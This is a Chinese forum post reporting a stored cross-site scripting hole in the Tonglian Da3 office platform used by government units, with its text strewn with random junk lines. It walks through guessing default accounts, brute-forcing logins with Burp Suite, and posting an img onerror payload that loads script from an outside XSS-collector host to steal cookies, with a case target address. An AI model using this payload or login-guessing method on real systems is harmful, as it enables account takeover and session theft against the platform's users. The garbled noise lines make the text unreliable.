' ?4 G% x) h2 D: T5 k* K8 Z
$ O& @3 y; W) ~" N3 ~' k 同联Da3协同办公平台后台通用储存型xss漏洞* m- p* h/ Z' t2 ~- F
# y- P: T+ {: c3 b6 X' n1 i8 S
* O2 t# i5 ?" ^, x
平台简介:
/ `7 h3 H9 k" Q/ k: v! w
' u& N, R6 M' C* l" C$ J( G% W t2 D
0 Q5 n w3 a) c2 z% X
, @ F3 a7 _6 J7 |8 M
! B/ m; F# n' [
8 V6 }2 Z( H1 @/ z# ^1 | 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
2 p x1 F7 M; y- J
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* i$ Q4 O% E3 [3 S6 x- p" o同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!! K* h% e- ~8 v, @ l6 {
/ C5 c7 ]" u2 b- N : t' J. u$ j$ T& @8 N) E
. v! s; h2 [: h2 `3 {' t$ G+ o
; P7 E) k+ f+ Y& `0 r
+ E N. }8 D/ c9 n' Q 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
. \0 z# `: w3 @, |# ?
- }( H: E: u, R) m5 x
+ ? x# {- q: A5 e1 H8 u9 T4 c$ @
$ [& r4 y ]3 Q7 _5 [
% b9 c5 {1 k8 I7 B
0 W3 p8 l8 u9 {8 p* R3 s1 X% \ http://1.1.1.1:7197/cap-aco/#(案例2-)
& B! F- N: d& ?
+ p: W3 O5 g* v2 F+ N
" p: [4 B2 |' h8 A) U$ u http://www.XXOO.com (案例1-官网网站)
$ Z9 h W( q' J y! N# @& `
7 w7 i; R/ Y4 D% T 7 k4 e4 V- M; [ G
漏洞详情:) {$ I: N t' |5 C; s& ~
: x5 m* i2 P. Q: W
n l1 A$ Z; \3 |* Y5 M4 _5 L 案例一、* w3 q& `9 W4 H# z+ o
" }# ]! Q, f# ~) S
. Z3 c7 O! }8 V) U# |
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
* ^& t5 [3 b( m! A. N$ g! @
2 f7 x& g' v( ]; F
% N, }+ X( L8 Z* X5 L 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
, s% |7 M3 l$ v8 H& H: o1 J
1 e. x: Z9 s2 N7 T% G9 s& q' @
6 w N' n( \' o' d. @
6 S. |' o. d0 p! |
4 A8 W( O% B% ]' p7 X1 N7 O, i# v " r4 Z: U! ~$ ~. v
3 A" X0 K4 W' A+ S5 ?
+ N7 F" K1 j" r* k j
- i O. n! e( k* f: D# J ?: R status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
& z6 J- O- l9 `/ {- n
" o6 m Z9 ^* r
% Z2 j+ h3 i' p: s5 i! F y & @8 j1 E- h& ?
1 h, X3 w4 B1 t. `
6 I( w( q9 E& M
S, V$ l% u, n, g3 ^0 |
! n1 t( C; k3 `( r2 p
/ I$ I" I/ q1 _1 O
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 " K2 M& ?2 Q; G6 s# r
6 x1 B; a/ K) n' p2 ? / O7 R$ G& X( k7 y! H* m( a
6 P7 I% E2 y; j" S" p
; Z8 T" N' t7 ^4 Q$ N% M: r
! M- E% g3 r9 H3 \: b <img src=x
: O* V: y2 N; L2 T4 k% Zonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
+ Q8 w& B6 s# w" B! s7 b" ^
0 l# O9 ~7 B& O3 ?& G( F' H+ M
* C( l+ o& l$ \8 N7 U$ j 
7 r/ @& ?! _$ L
; O2 y. y; P: a9 Q) o
+ z ?7 x& i8 x% e* D
然后发送,接收cookie如图:
( k2 [# [8 }" @; a5 e2 S. u7 g& |
: J1 s- @1 n: ~0 l* }
+ B3 f0 s& l0 O5 u/ g1 i
8 a( N! g; t& b
, L3 s |# D3 X/ f ! t6 z, K7 g0 S" Z/ G+ K% z
0 {) {7 ^0 ~6 X0 I
! R$ ]& S, U0 V9 O0 N & P. }6 k2 ~! n$ g. A
1 j/ @# V4 {1 g7 M: w. d' O& f/ f
$ I o# u& i$ H - _) r9 K2 B7 {/ U1 a
, ^. K: _' p3 ?# _ @
+ b# ]6 @* w+ N7 V9 i * n" G6 n4 d, V
! h( a1 V% w5 K1 l$ L) f. b
# r3 c3 k: U" \( s. v7 |
/ r& O$ D& i% ]/ n. K1 N 
5 S. E4 B+ W- {( W5 g5 s8 M7 w- \
0 a" M; S# @, V+ Q/ w2 b' [7 e, q' k
0 G/ R' y4 W! _: N2 h8 G
' v( T, r8 E5 i$ ?1 Z d1 ?
' C# P S) q1 G0 D6 ?
8 h5 ^3 M1 G" S" R0 i$ g3 y* m# f 案例2、
+ e2 M3 N" D; X$ d" v& g) x% i
! V O* ^5 ~6 _
, n1 g/ |5 o1 ^, Y( U
前面步骤都一样,下面看效果图:
% X, s* ~5 b) |# s
3 e% V4 k2 g& q8 m2 E& L
3 i `& v& Y C* _9 c& M* T7 O
' ~) r/ G7 R/ w O# _ v: T! \
$ u+ _4 d" U7 L/ c
" n; v E( X5 S
: ?$ P( n/ @% }7 |( d# h& S
. i+ \& s7 t/ q$ d8 C0 e' l
/ X7 u" j' b7 t; E. E1 g6 s
, L8 ^, Z3 Q2 z7 ?, \% D. U/ ^- _
8 ^7 W) M/ {8 U; {" I3 X3 X
1 C6 H& A7 {8 ^% M 9 q) `$ A2 L/ s" t
- L1 r q. Q! ]( g: `$ Z q: H, ]$ {. X: T
6 \, I* X! K3 _) d$ @: Y, T
+ v, v* L# y, y S
/ J* p+ C5 D! L5 n- S+ q
; n* I0 e3 R. f8 a$ S) R
' p. N3 Y7 S+ T& J2 P, P. Y 6 H$ L3 @1 |* d6 X) k2 V& t# P% G
8 c: s+ @* k z, y# j+ d! D, N
8 B( h+ z% h* R" |' o
" d x0 B7 V4 w
1 j! ]# h8 W2 A& |) x* b; t
8 ?: {- ?: Q1 M% |
' d" s; a( S- @+ N4 \: y" L 5 T5 B2 @. j9 G
g |/ E/ U5 x
发表于 2018-10-20 20:14:15
收藏
支持
反对